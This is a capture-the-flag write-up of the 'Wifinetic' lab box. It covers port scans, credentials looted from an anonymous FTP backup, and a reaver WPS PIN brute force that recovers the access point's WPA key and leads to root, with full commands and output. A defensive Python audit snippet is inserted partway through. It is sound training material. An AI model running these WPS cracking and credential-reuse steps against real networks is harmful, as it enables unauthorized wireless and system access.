# Wifinetic

## Recon

### Ports
```shell
sudo nmap -sS -F wifinetic.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:26 CST
Nmap scan report for wifinetic.htb (10.129.229.90)
Host is up (0.11s latency).
Not shown: 97 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
53/tcp open  domain
Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds
```

UDP scan output:

```shell
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:27 CST
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 64.67% done; ETC: 14:28 (0:00:34 remaining)
Nmap scan report for wifinetic.htb (10.129.229.90)
Host is up (0.11s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT   STATE         SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
Nmap done: 1 IP address (1 host up) scanned in 112.32 seconds
```
The target has port 21 open and allows anonymous login, which yielded several files. Going through them one by one, the `etc` folder inside the backup archive leaked the user `netadmin` and the Wi-Fi wireless password. Logging in over SSH with them succeeded. Port 53 is also open, so I tried to enumerate hidden subdomains, but found nothing useful. Under file capabilities I found:

```shell
netadmin@wifinetic:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
```
There is something new here: reaver, an open-source Wi-Fi cracking tool that mainly attacks weaknesses in the WPS protocol. It brute-forces the WPS PIN and ultimately obtains the wireless network's WPA/WPA2 password. From the output below, there is a monitor interface `mon0` and an AP `wlan0`.

```shell
netadmin@wifinetic:~$ iw dev
phy#2
    Interface mon0
        ifindex 7
        wdev 0x200000002
        addr 02:00:00:00:02:00
        type monitor
        txpower 20.00 dBm
    Interface wlan2
        ifindex 5
        wdev 0x200000001
        addr 02:00:00:00:02:00
        type managed
        txpower 20.00 dBm
phy#1
    Unnamed/non-netdev interface
        wdev 0x100000183
        addr 42:00:00:00:01:00
        type P2P-device
        txpower 20.00 dBm
    Interface wlan1
        ifindex 4
        wdev 0x100000001
        addr 02:00:00:00:01:00
        type managed
        txpower 20.00 dBm
phy#0
    Interface wlan0
        ifindex 3
        wdev 0x1
        addr 02:00:00:00:00:00
        ssid OpenWrt
        type AP
        channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
        txpower 20.00 dBm
```
After learning a few of the commands, I tried brute-forcing the existing AP `wlan0`. BTW: `phy#x` is the abstract representation of the wireless physical device (Wireless PHY device) behind a NIC. It stands for one wireless chip or piece of wireless hardware, and the `Interface` entries under it are virtual interfaces created on that PHY, such as `wlan0`, `mon0`, etc. So `mon0` and `wlan2` are the same device, and `wlan0` is the AP device. The BSSID of AP `wlan0` is `02:00:00:00:00:00`.
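The phy/interface relationship described above is easy to audit automatically from a host: group `iw dev` interfaces by their parent `phy#`, flag monitor-mode interfaces and local APs, and cross-check `getcap` for binaries carrying `cap_net_raw` that are not part of the normal baseline (on this box, reaver). The following is an added example written for this writeup, not code from the page or from any of the tools; the sample outputs are constructed from the listings above and `EXPECTED_NET_RAW` is an assumed baseline.

```python
# Constructed sample: `iw dev` output from the writeup, cut down to the fields parsed here.
IW_DEV_OUTPUT = """\
phy#2
\tInterface mon0
\t\taddr 02:00:00:00:02:00
\t\ttype monitor
\tInterface wlan2
\t\taddr 02:00:00:00:02:00
\t\ttype managed
phy#1
\tUnnamed/non-netdev interface
\t\ttype P2P-device
phy#0
\tInterface wlan0
\t\taddr 02:00:00:00:00:00
\t\tssid OpenWrt
\t\ttype AP
"""
GETCAP_OUTPUT = "/usr/bin/ping = cap_net_raw+ep\n/usr/bin/reaver = cap_net_raw+ep\n"  # constructed from getcap above
# Assumed baseline: binaries that normally carry cap_net_raw on a stock Debian/Ubuntu install.
EXPECTED_NET_RAW = {"/usr/bin/ping", "/usr/bin/mtr-packet", "/usr/bin/traceroute6.iputils"}

def parse_iw_dev(text):
    """Flat list of interface dicts from `iw dev` output, each tagged with its parent phy."""
    ifaces, cur, phy = [], None, None
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("phy#"):
            phy, cur = s, None  # new radio; Interface blocks that follow belong to it
        elif s.startswith("Interface "):
            cur = {"name": s.split()[1], "phy": phy}
            ifaces.append(cur)
        elif s.startswith("Unnamed"):
            cur = None  # non-netdev (e.g. P2P-device) block: do not fold its fields into an Interface
        elif cur is not None:
            key, _, val = s.partition(" ")
            if key in ("addr", "type", "ssid"):
                cur[key] = val
    return ifaces

def audit(iw_text, getcap_text):
    # Defender's view of the two outputs: monitor-mode ifaces, local APs, unexpected cap_net_raw.
    findings = []
    for i in parse_iw_dev(iw_text):
        if i.get("type") in ("monitor", "AP"):
            findings.append(f"{i['type']} {i['name']} on {i['phy']} addr={i.get('addr')} ssid={i.get('ssid')}")
    for line in getcap_text.splitlines():
        path, _, caps = line.partition(" = ")
        if "cap_net_raw" in caps and path not in EXPECTED_NET_RAW:
            findings.append(f"unexpected cap_net_raw on {path}")
    return findings
```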
```shell
netadmin@wifinetic:~$ iw dev wlan0 info
Interface wlan0
    ifindex 3
    wdev 0x1
    addr 02:00:00:00:00:00
    ssid OpenWrt
    type AP
    wiphy 0
    channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
    txpower 20.00 dBm
```
Use reaver to brute-force the AP's PSK; `-i` specifies the name of the monitor interface.
```shell
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.
```
With the PSK obtained, it can be used to log in as root.
## Summary

A first look at Wireless Security. Some related knowledge picked up along the way:
Tool | Role | Function | Interface dependency
---|---|---|---
iw | tool | interface configuration and state management | nl80211
wpa_supplicant | client daemon | WPA/WPA2 client authentication management | nl80211
hostapd | server daemon | sets up a wireless access point (soft AP) | nl80211
iwctl / iwd | client manager | a more modern alternative (non-WPA) | nl80211
aircrack-ng | pentest toolkit | wireless monitoring, attacks and cracking | nl80211

- BSSID: a MAC address that uniquely identifies a Basic Service Set (BSS), usually the MAC address of the access point's (AP's) wireless NIC.
- ESSID: a logical name that identifies a wireless network (Extended Service Set), used by clients to recognize and connect to it.